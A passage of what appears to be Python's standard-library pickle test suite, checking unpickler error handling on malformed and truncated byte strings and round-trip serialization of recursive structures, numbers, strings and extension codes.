def test_correctly_quoted_string(self):
goodpickles = [(b"S''\n.", ''),
(b'S""\n.', ''),
(b'S"\\n"\n.', '\n'),
(b"S'\\n'\n.", '\n')]
for p, expected in goodpickles:
self.assertEqual(self.loads(p), expected)
def test_frame_readline(self):
pickled = b'\x80\x04\x95\x05\x00\x00\x00\x00\x00\x00\x00I42\n.'
# 0: \x80 PROTO 4
# 2: \x95 FRAME 5
# 11: I INT 42
# 15: . STOP
self.assertEqual(self.loads(pickled), 42)
def test_compat_unpickle(self):
# xrange(1, 7)
pickled = b'\x80\x02c__builtin__\nxrange\nK\x01K\x07K\x01\x87R.'
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), range)
self.assertEqual(unpickled, range(1, 7))
self.assertEqual(list(unpickled), [1, 2, 3, 4, 5, 6])
# reduce
pickled = b'\x80\x02c__builtin__\nreduce\n.'
self.assertIs(self.loads(pickled), functools.reduce)
# whichdb.whichdb
pickled = b'\x80\x02cwhichdb\nwhichdb\n.'
self.assertIs(self.loads(pickled), dbm.whichdb)
# Exception(), StandardError()
for name in (b'Exception', b'StandardError'):
pickled = (b'\x80\x02cexceptions\n' + name + b'\nU\x03ugh\x85R.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), Exception)
self.assertEqual(str(unpickled), 'ugh')
# UserDict.UserDict({1: 2}), UserDict.IterableUserDict({1: 2})
for name in (b'UserDict', b'IterableUserDict'):
pickled = (b'\x80\x02(cUserDict\n' + name +
b'\no}U\x04data}K\x01K\x02ssb.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), collections.UserDict)
self.assertEqual(unpickled, collections.UserDict({1: 2}))
def test_bad_reduce(self):
self.assertEqual(self.loads(b'cbuiltins\nint\n)R.'), 0)
self.check_unpickling_error(TypeError, b'N)R.')
self.check_unpickling_error(TypeError, b'cbuiltins\nint\nNR.')
def test_bad_newobj(self):
error = (pickle.UnpicklingError, TypeError)
self.assertEqual(self.loads(b'cbuiltins\nint\n)\x81.'), 0)
self.check_unpickling_error(error, b'cbuiltins\nlen\n)\x81.')
self.check_unpickling_error(error, b'cbuiltins\nint\nN\x81.')
def test_bad_newobj_ex(self):
error = (pickle.UnpicklingError, TypeError)
self.assertEqual(self.loads(b'cbuiltins\nint\n)}\x92.'), 0)
self.check_unpickling_error(error, b'cbuiltins\nlen\n)}\x92.')
self.check_unpickling_error(error, b'cbuiltins\nint\nN}\x92.')
self.check_unpickling_error(error, b'cbuiltins\nint\n)N\x92.')
def test_bad_stack(self):
badpickles = [
b'.', # STOP
b'0', # POP
b'1', # POP_MARK
b'2', # DUP
b'(2',
b'R', # REDUCE
b')R',
b'a', # APPEND
b'Na',
b'b', # BUILD
b'Nb',
b'd', # DICT
b'e', # APPENDS
b'(e',
b'ibuiltins\nlist\n', # INST
b'l', # LIST
b'o', # OBJ
b'(o',
b'p1\n', # PUT
b'q\x00', # BINPUT
b'r\x00\x00\x00\x00', # LONG_BINPUT
b's', # SETITEM
b'Ns',
b'NNs',
b't', # TUPLE
b'u', # SETITEMS
b'(u',
b'}(Nu',
b'\x81', # NEWOBJ
b')\x81',
b'\x85', # TUPLE1
b'\x86', # TUPLE2
b'N\x86',
b'\x87', # TUPLE3
b'N\x87',
b'NN\x87',
b'\x90', # ADDITEMS
b'(\x90',
b'\x91', # FROZENSET
b'\x92', # NEWOBJ_EX
b')}\x92',
b'\x93', # STACK_GLOBAL
b'Vlist\n\x93',
b'\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_bad_mark(self):
badpickles = [
b'N(.', # STOP
b'N(2', # DUP
b'cbuiltins\nlist\n)(R', # REDUCE
b'cbuiltins\nlist\n()R',
b']N(a', # APPEND
# BUILD
b'cbuiltins\nValueError\n)R}(b',
b'cbuiltins\nValueError\n)R(}b',
b'(Nd', # DICT
b'N(p1\n', # PUT
b'N(q\x00', # BINPUT
b'N(r\x00\x00\x00\x00', # LONG_BINPUT
b'}NN(s', # SETITEM
b'}N(Ns',
b'}(NNs',
b'}((u', # SETITEMS
b'cbuiltins\nlist\n)(\x81', # NEWOBJ
b'cbuiltins\nlist\n()\x81',
b'N(\x85', # TUPLE1
b'NN(\x86', # TUPLE2
b'N(N\x86',
b'NNN(\x87', # TUPLE3
b'NN(N\x87',
b'N(NN\x87',
b']((\x90', # ADDITEMS
# NEWOBJ_EX
b'cbuiltins\nlist\n)}(\x92',
b'cbuiltins\nlist\n)(}\x92',
b'cbuiltins\nlist\n()}\x92',
# STACK_GLOBAL
b'Vbuiltins\n(Vlist\n\x93',
b'Vbuiltins\nVlist\n(\x93',
b'N(\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_truncated_data(self):
self.check_unpickling_error(EOFError, b'')
self.check_unpickling_error(EOFError, b'N')
badpickles = [
b'B', # BINBYTES
b'B\x03\x00\x00',
b'B\x03\x00\x00\x00',
b'B\x03\x00\x00\x00ab',
b'C', # SHORT_BINBYTES
b'C\x03',
b'C\x03ab',
b'F', # FLOAT
b'F0.0',
b'F0.00',
b'G', # BINFLOAT
b'G\x00\x00\x00\x00\x00\x00\x00',
b'I', # INT
b'I0',
b'J', # BININT
b'J\x00\x00\x00',
b'K', # BININT1
b'L', # LONG
b'L0',
b'L10',
b'L0L',
b'L10L',
b'M', # BININT2
b'M\x00',
# b'P', # PERSID
# b'Pabc',
b'S', # STRING
b"S'abc'",
b'T', # BINSTRING
b'T\x03\x00\x00',
b'T\x03\x00\x00\x00',
b'T\x03\x00\x00\x00ab',
b'U', # SHORT_BINSTRING
b'U\x03',
b'U\x03ab',
b'V', # UNICODE
b'Vabc',
b'X', # BINUNICODE
b'X\x03\x00\x00',
b'X\x03\x00\x00\x00',
b'X\x03\x00\x00\x00ab',
b'(c', # GLOBAL
b'(cbuiltins',
b'(cbuiltins\n',
b'(cbuiltins\nlist',
b'Ng', # GET
b'Ng0',
b'(i', # INST
b'(ibuiltins',
b'(ibuiltins\n',
b'(ibuiltins\nlist',
b'Nh', # BINGET
b'Nj', # LONG_BINGET
b'Nj\x00\x00\x00',
b'Np', # PUT
b'Np0',
b'Nq', # BINPUT
b'Nr', # LONG_BINPUT
b'Nr\x00\x00\x00',
b'\x80', # PROTO
b'\x82', # EXT1
b'\x83', # EXT2
b'\x84\x01',
b'\x84', # EXT4
b'\x84\x01\x00\x00',
b'\x8a', # LONG1
b'\x8b', # LONG4
b'\x8b\x00\x00\x00',
b'\x8c', # SHORT_BINUNICODE
b'\x8c\x03',
b'\x8c\x03ab',
b'\x8d', # BINUNICODE8
b'\x8d\x03\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x8e', # BINBYTES8
b'\x8e\x03\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x96', # BYTEARRAY8
b'\x96\x03\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x95', # FRAME
b'\x95\x02\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00N',
]
for p in badpickles:
self.check_unpickling_error(self.truncated_errors, p)
@reap_threads
def test_unpickle_module_race(self):
# https://bugs.python.org/issue34572
locker_module = dedent("""
import threading
barrier = threading.Barrier(2)
""")
locking_import_module = dedent("""
import locker
locker.barrier.wait()
class ToBeUnpickled(object):
pass
""")
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
with open(os.path.join(TESTFN, "locker.py"), "wb") as f:
f.write(locker_module.encode('utf-8'))
with open(os.path.join(TESTFN, "locking_import.py"), "wb") as f:
f.write(locking_import_module.encode('utf-8'))
self.addCleanup(forget, "locker")
self.addCleanup(forget, "locking_import")
import locker
pickle_bytes = (
b'\x80\x03clocking_import\nToBeUnpickled\nq\x00)\x81q\x01.')
# Then try to unpickle two of these simultaneously
# One of them will cause the module import, and we want it to block
# until the other one either:
# - fails (before the patch for this issue)
# - blocks on the import lock for the module, as it should
results = []
barrier = threading.Barrier(3)
def t():
# This ensures the threads have all started
# presumably barrier release is faster than thread startup
barrier.wait()
results.append(pickle.loads(pickle_bytes))
t1 = threading.Thread(target=t)
t2 = threading.Thread(target=t)
t1.start()
t2.start()
barrier.wait()
# could have delay here
locker.barrier.wait()
t1.join()
t2.join()
from locking_import import ToBeUnpickled
self.assertEqual(
[type(x) for x in results],
[ToBeUnpickled] * 2)
class AbstractPickleTests(unittest.TestCase):
# Subclass must define self.dumps, self.loads.
optimized = False
_testdata = AbstractUnpickleTests._testdata
def setUp(self):
pass
assert_is_copy = AbstractUnpickleTests.assert_is_copy
def test_misc(self):
# test various datatypes not tested by testdata
for proto in protocols:
x = myint(4)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = (1, ())
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = initarg(1, x)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
# XXX test __reduce__ protocol?
def test_roundtrip_equality(self):
expected = self._testdata
for proto in protocols:
s = self.dumps(expected, proto)
got = self.loads(s)
self.assert_is_copy(expected, got)
# There are gratuitous differences between pickles produced by
# pickle and cPickle, largely because cPickle starts PUT indices at
# 1 and pickle starts them at 0. See XXX comment in cPickle's put2() --
# there's a comment with an exclamation point there whose meaning
# is a mystery. cPickle also suppresses PUT for objects with a refcount
# of 1.
def dont_test_disassembly(self):
from io import StringIO
from pickletools import dis
for proto, expected in (0, DATA0_DIS), (1, DATA1_DIS):
s = self.dumps(self._testdata, proto)
filelike = StringIO()
dis(s, out=filelike)
got = filelike.getvalue()
self.assertEqual(expected, got)
def _test_recursive_list(self, cls, aslist=identity, minprotocol=0):
# List containing itself.
l = cls()
l.append(l)
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = aslist(x)
self.assertEqual(len(y), 1)
self.assertIs(y[0], x)
def test_recursive_list(self):
self._test_recursive_list(list)
def test_recursive_list_subclass(self):
self._test_recursive_list(MyList, minprotocol=2)
def test_recursive_list_like(self):
self._test_recursive_list(REX_six, aslist=lambda x: x.items)
def _test_recursive_tuple_and_list(self, cls, aslist=identity, minprotocol=0):
# Tuple containing a list containing the original tuple.
t = (cls(),)
t[0].append(t)
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], cls)
y = aslist(x[0])
self.assertEqual(len(y), 1)
self.assertIs(y[0], x)
# List containing a tuple containing the original list.
t, = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = aslist(x)
self.assertEqual(len(y), 1)
self.assertIsInstance(y[0], tuple)
self.assertEqual(len(y[0]), 1)
self.assertIs(y[0][0], x)
def test_recursive_tuple_and_list(self):
self._test_recursive_tuple_and_list(list)
def test_recursive_tuple_and_list_subclass(self):
self._test_recursive_tuple_and_list(MyList, minprotocol=2)
def test_recursive_tuple_and_list_like(self):
self._test_recursive_tuple_and_list(REX_six, aslist=lambda x: x.items)
def _test_recursive_dict(self, cls, asdict=identity, minprotocol=0):
# Dict containing itself.
d = cls()
d[1] = d
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(list(y.keys()), [1])
self.assertIs(y[1], x)
def test_recursive_dict(self):
self._test_recursive_dict(dict)
def test_recursive_dict_subclass(self):
self._test_recursive_dict(MyDict, minprotocol=2)
def test_recursive_dict_like(self):
self._test_recursive_dict(REX_seven, asdict=lambda x: x.table)
def _test_recursive_tuple_and_dict(self, cls, asdict=identity, minprotocol=0):
# Tuple containing a dict containing the original tuple.
t = (cls(),)
t[0][1] = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], cls)
y = asdict(x[0])
self.assertEqual(list(y), [1])
self.assertIs(y[1], x)
# Dict containing a tuple containing the original dict.
t, = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(list(y), [1])
self.assertIsInstance(y[1], tuple)
self.assertEqual(len(y[1]), 1)
self.assertIs(y[1][0], x)
def test_recursive_tuple_and_dict(self):
self._test_recursive_tuple_and_dict(dict)
def test_recursive_tuple_and_dict_subclass(self):
self._test_recursive_tuple_and_dict(MyDict, minprotocol=2)
def test_recursive_tuple_and_dict_like(self):
self._test_recursive_tuple_and_dict(REX_seven, asdict=lambda x: x.table)
def _test_recursive_dict_key(self, cls, asdict=identity, minprotocol=0):
# Dict containing an immutable object (as key) containing the original
# dict.
d = cls()
d[K(d)] = 1
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(len(y.keys()), 1)
self.assertIsInstance(list(y.keys())[0], K)
self.assertIs(list(y.keys())[0].value, x)
def test_recursive_dict_key(self):
self._test_recursive_dict_key(dict)
def test_recursive_dict_subclass_key(self):
self._test_recursive_dict_key(MyDict, minprotocol=2)
def test_recursive_dict_like_key(self):
self._test_recursive_dict_key(REX_seven, asdict=lambda x: x.table)
def _test_recursive_tuple_and_dict_key(self, cls, asdict=identity, minprotocol=0):
# Tuple containing a dict containing an immutable object (as key)
# containing the original tuple.
t = (cls(),)
t[0][K(t)] = 1
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], cls)
y = asdict(x[0])
self.assertEqual(len(y), 1)
self.assertIsInstance(list(y.keys())[0], K)
self.assertIs(list(y.keys())[0].value, x)
# Dict containing an immutable object (as key) containing a tuple
# containing the original dict.
t, = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(len(y), 1)
self.assertIsInstance(list(y.keys())[0], K)
self.assertIs(list(y.keys())[0].value[0], x)
def test_recursive_tuple_and_dict_key(self):
self._test_recursive_tuple_and_dict_key(dict)
def test_recursive_tuple_and_dict_subclass_key(self):
self._test_recursive_tuple_and_dict_key(MyDict, minprotocol=2)
def test_recursive_tuple_and_dict_like_key(self):
self._test_recursive_tuple_and_dict_key(REX_seven, asdict=lambda x: x.table)
def test_recursive_set(self):
# Set containing an immutable object containing the original set.
y = set()
y.add(K(y))
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, set)
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], K)
self.assertIs(list(x)[0].value, x)
# Immutable object containing a set containing the original object.
y, = y
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, K)
self.assertIsInstance(x.value, set)
self.assertEqual(len(x.value), 1)
self.assertIs(list(x.value)[0], x)
def test_recursive_inst(self):
# Mutable object containing itself.
i = Object()
i.attr = i
for proto in protocols:
s = self.dumps(i, proto)
x = self.loads(s)
self.assertIsInstance(x, Object)
self.assertEqual(dir(x), dir(i))
self.assertIs(x.attr, x)
def test_recursive_multi(self):
l = []
d = {1:l}
i = Object()
i.attr = d
l.append(i)
for proto in protocols:
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, list)
self.assertEqual(len(x), 1)
self.assertEqual(dir(x[0]), dir(i))
self.assertEqual(list(x[0].attr.keys()), [1])
self.assertIs(x[0].attr[1], x)
def _test_recursive_collection_and_inst(self, factory):
# Mutable object containing a collection containing the original
# object.
o = Object()
o.attr = factory([o])
t = type(o.attr)
for proto in protocols:
s = self.dumps(o, proto)
x = self.loads(s)
self.assertIsInstance(x.attr, t)
self.assertEqual(len(x.attr), 1)
self.assertIsInstance(list(x.attr)[0], Object)
self.assertIs(list(x.attr)[0], x)
# Collection containing a mutable object containing the original
# collection.
o = o.attr
for proto in protocols:
s = self.dumps(o, proto)
x = self.loads(s)
self.assertIsInstance(x, t)
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], Object)
self.assertIs(list(x)[0].attr, x)
def test_recursive_list_and_inst(self):
self._test_recursive_collection_and_inst(list)
def test_recursive_tuple_and_inst(self):
self._test_recursive_collection_and_inst(tuple)
def test_recursive_dict_and_inst(self):
self._test_recursive_collection_and_inst(dict.fromkeys)
def test_recursive_set_and_inst(self):
self._test_recursive_collection_and_inst(set)
def test_recursive_frozenset_and_inst(self):
self._test_recursive_collection_and_inst(frozenset)
def test_recursive_list_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyList)
def test_recursive_tuple_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyTuple)
def test_recursive_dict_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyDict.fromkeys)
def test_recursive_set_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MySet)
def test_recursive_frozenset_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyFrozenSet)
def test_recursive_inst_state(self):
# Mutable object containing itself.
y = REX_state()
y.state = y
for proto in protocols:
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, REX_state)
self.assertIs(x.state, x)
def test_recursive_tuple_and_inst_state(self):
# Tuple containing a mutable object containing the original tuple.
t = (REX_state(),)
t[0].state = t
for proto in protocols:
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], REX_state)
self.assertIs(x[0].state, x)
# Mutable object containing a tuple containing the object.
t, = t
for proto in protocols:
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, REX_state)
self.assertIsInstance(x.state, tuple)
self.assertEqual(len(x.state), 1)
self.assertIs(x.state[0], x)
def test_unicode(self):
endcases = ['', '<\\u>', '<\\\u1234>', '<\n>',
'<\\>', '<\\\U00012345>',
# surrogates
'<\udc80>']
for proto in protocols:
for u in endcases:
p = self.dumps(u, proto)
u2 = self.loads(p)
self.assert_is_copy(u, u2)
def test_unicode_high_plane(self):
t = '\U00012345'
for proto in protocols:
p = self.dumps(t, proto)
t2 = self.loads(p)
self.assert_is_copy(t, t2)
def test_bytes(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i, i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
def test_bytearray(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
b = bytearray(s)
p = self.dumps(b, proto)
bb = self.loads(p)
self.assertIsNot(bb, b)
self.assert_is_copy(b, bb)
if proto <= 3:
# bytearray is serialized using a global reference
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.GLOBAL, p))
elif proto == 4:
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.STACK_GLOBAL, p))
elif proto == 5:
self.assertNotIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.BYTEARRAY8, p))
def test_ints(self):
for proto in protocols:
n = sys.maxsize
while n:
for expected in (-n, n):
s = self.dumps(expected, proto)
n2 = self.loads(s)
self.assert_is_copy(expected, n2)
n = n >> 1
def test_long(self):
for proto in protocols:
# 256 bytes is where LONG4 begins.
for nbits in 1, 8, 8*254, 8*255, 8*256, 8*257:
nbase = 1 << nbits
for npos in nbase-1, nbase, nbase+1:
for n in npos, -npos:
pickle = self.dumps(n, proto)
got = self.loads(pickle)
self.assert_is_copy(n, got)
# Try a monster. This is quadratic-time in protos 0 & 1, so don't
# bother with those.
nbase = int("deadbeeffeedface", 16)
nbase += nbase << 1000000
for n in nbase, -nbase:
p = self.dumps(n, 2)
got = self.loads(p)
# assert_is_copy is very expensive here as it precomputes
# a failure message by computing the repr() of n and got,
# we just do the check ourselves.
self.assertIs(type(got), int)
self.assertEqual(n, got)
def test_float(self):
test_values = [0.0, 4.94e-324, 1e-310, 7e-308, 6.626e-34, 0.1, 0.5,
3.14, 263.44582062374053, 6.022e23, 1e30]
test_values = test_values + [-x for x in test_values]
for proto in protocols:
for value in test_values:
pickle = self.dumps(value, proto)
got = self.loads(pickle)
self.assert_is_copy(value, got)
@run_with_locale('LC_ALL', 'de_DE', 'fr_FR')
def test_float_format(self):
# make sure that floats are formatted locale independent with proto 0
self.assertEqual(self.dumps(1.2, 0)[0:3], b'F1.')
def test_reduce(self):
for proto in protocols:
inst = AAA()
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assertEqual(loaded, REDUCE_A)
def test_getinitargs(self):
for proto in protocols:
inst = initarg(1, 2)
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assert_is_copy(inst, loaded)
def test_metaclass(self):
a = use_metaclass()
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a.__class__, b.__class__)
def test_dynamic_class(self):
a = create_dynamic_class("my_dynamic_class", (object,))
copyreg.pickle(pickling_metaclass, pickling_metaclass.__reduce__)
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a, b)
self.assertIs(type(a), type(b))
def test_structseq(self):
import time
import os
t = time.localtime()
for proto in protocols:
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
t = os.stat(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
if hasattr(os, "statvfs"):
t = os.statvfs(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
def test_ellipsis(self):
for proto in protocols:
s = self.dumps(..., proto)
u = self.loads(s)
self.assertIs(..., u)
def test_notimplemented(self):
for proto in protocols:
s = self.dumps(NotImplemented, proto)
u = self.loads(s)
self.assertIs(NotImplemented, u)
def test_singleton_types(self):
# Issue #6477: Test that types of built-in singletons can be pickled.
singletons = [None, ..., NotImplemented]
for singleton in singletons:
for proto in protocols:
s = self.dumps(type(singleton), proto)
u = self.loads(s)
self.assertIs(type(singleton), u)
# Tests for protocol 2
def test_proto(self):
for proto in protocols:
pickled = self.dumps(None, proto)
if proto >= 2:
proto_header = pickle.PROTO + bytes([proto])
self.assertTrue(pickled.startswith(proto_header))
else:
self.assertEqual(count_opcode(pickle.PROTO, pickled), 0)
oob = protocols[-1] + 1 # a future protocol
build_none = pickle.NONE + pickle.STOP
badpickle = pickle.PROTO + bytes([oob]) + build_none
try:
self.loads(badpickle)
except ValueError as err:
self.assertIn("unsupported pickle protocol", str(err))
else:
self.fail("expected bad protocol number to raise ValueError")
def test_long1(self):
x = 12345678910111213141516178920
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG1, s), proto >= 2)
def test_long4(self):
x = 12345678910111213141516178920 << (256*8)
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG4, s), proto >= 2)
def test_short_tuples(self):
# Map (proto, len(tuple)) to expected opcode.
expected_opcode = {(0, 0): pickle.TUPLE,
(0, 1): pickle.TUPLE,
(0, 2): pickle.TUPLE,
(0, 3): pickle.TUPLE,
(0, 4): pickle.TUPLE,
(1, 0): pickle.EMPTY_TUPLE,
(1, 1): pickle.TUPLE,
(1, 2): pickle.TUPLE,
(1, 3): pickle.TUPLE,
(1, 4): pickle.TUPLE,
(2, 0): pickle.EMPTY_TUPLE,
(2, 1): pickle.TUPLE1,
(2, 2): pickle.TUPLE2,
(2, 3): pickle.TUPLE3,
(2, 4): pickle.TUPLE,
(3, 0): pickle.EMPTY_TUPLE,
(3, 1): pickle.TUPLE1,
(3, 2): pickle.TUPLE2,
(3, 3): pickle.TUPLE3,
(3, 4): pickle.TUPLE,
}
a = ()
b = (1,)
c = (1, 2)
d = (1, 2, 3)
e = (1, 2, 3, 4)
for proto in protocols:
for x in a, b, c, d, e:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
expected = expected_opcode[min(proto, 3), len(x)]
self.assertTrue(opcode_in_pickle(expected, s))
def test_singletons(self):
# Map (proto, singleton) to expected opcode.
expected_opcode = {(0, None): pickle.NONE,
(1, None): pickle.NONE,
(2, None): pickle.NONE,
(3, None): pickle.NONE,
(0, True): pickle.INT,
(1, True): pickle.INT,
(2, True): pickle.NEWTRUE,
(3, True): pickle.NEWTRUE,
(0, False): pickle.INT,
(1, False): pickle.INT,
(2, False): pickle.NEWFALSE,
(3, False): pickle.NEWFALSE,
}
for proto in protocols:
for x in None, False, True:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertTrue(x is y, (proto, x, s, y))
expected = expected_opcode[min(proto, 3), x]
self.assertTrue(opcode_in_pickle(expected, s))
def test_newobj_tuple(self):
x = MyTuple([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_list(self):
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_generic(self):
for proto in protocols:
for C in myclasses:
B = C.__base__
x = C(C.sample)
x.foo = 42
s = self.dumps(x, proto)
y = self.loads(s)
detail = (proto, C, B, x, y, type(y))
self.assert_is_copy(x, y) # XXX revisit
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_proxies(self):
# NEWOBJ should use the __class__ rather than the raw type
classes = myclasses[:]
# Cannot create weakproxies to these classes
for c in (MyInt, MyTuple):
classes.remove(c)
for proto in protocols:
for C in classes:
B = C.__base__
x = C(C.sample)
x.foo = 42
p = weakref.proxy(x)
s = self.dumps(p, proto)
y = self.loads(s)
self.assertEqual(type(y), type(x)) # rather than type(p)
detail = (proto, C, B, x, y, type(y))
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_not_class(self):
# Issue 24552
global SimpleNewObj
save = SimpleNewObj
o = SimpleNewObj.__new__(SimpleNewObj)
b = self.dumps(o, 4)
try:
SimpleNewObj = 42
self.assertRaises((TypeError, pickle.UnpicklingError), self.loads, b)
finally:
SimpleNewObj = save
# Register a type with copyreg, with extension code extcode. Pickle
# an object of that type. Check that the resulting pickle uses opcode
# (EXT[124]) under proto 2, and not in proto 1.
def produce_global_ext(self, extcode, opcode):
e = ExtensionSaver(extcode)
try:
copyreg.add_extension(__name__, "MyList", extcode)
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
# Dump using protocol 1 for comparison.
s1 = self.dumps(x, 1)
self.assertIn(__name__.encode("utf-8"), s1)
self.assertIn(b"MyList", s1)
self.assertFalse(opcode_in_pickle(opcode, s1))
y = self.loads(s1)
self.assert_is_copy(x, y)
# Dump using protocol 2 for test.
s2 = self.dumps(x, 2)
self.assertNotIn(__name__.encode("utf-8"), s2)
self.assertNotIn(b"MyList", s2)
self.assertEqual(opcode_in_pickle(opcode, s2), True, repr(s2))
y = self.loads(s2)
self.assert_is_copy(x, y)
finally:
e.restore()
def test_global_ext1(self):
self.produce_global_ext(0x00000001, pickle.EXT1) # smallest EXT1 code
self.produce_global_ext(0x000000ff, pickle.EXT1) # largest EXT1 code
def test_global_ext2(self):
self.produce_global_ext(0x00000100, pickle.EXT2) # smallest EXT2 code
self.produce_global_ext(0x0000ffff, pickle.EXT2) # largest EXT2 code
self.produce_global_ext(0x0000abcd, pickle.EXT2) # check endianness
def test_global_ext4(self):
self.produce_global_ext(0x00010000, pickle.EXT4) # smallest EXT4 code
self.produce_global_ext(0x7fffffff, pickle.EXT4) # largest EXT4 code
self.produce_global_ext(0x12abcdef, pickle.EXT4) # check endianness
def test_list_chunking(self):
n = 10 # too small to chunk
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
self.assertEqual(num_appends, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
if proto == 0:
self.assertEqual(num_appends, 0)
else:
self.assertTrue(num_appends >= 2)
def test_dict_chunking(self):
n = 10 # too small to chunk
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
self.assertIsInstance(s, bytes_types)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
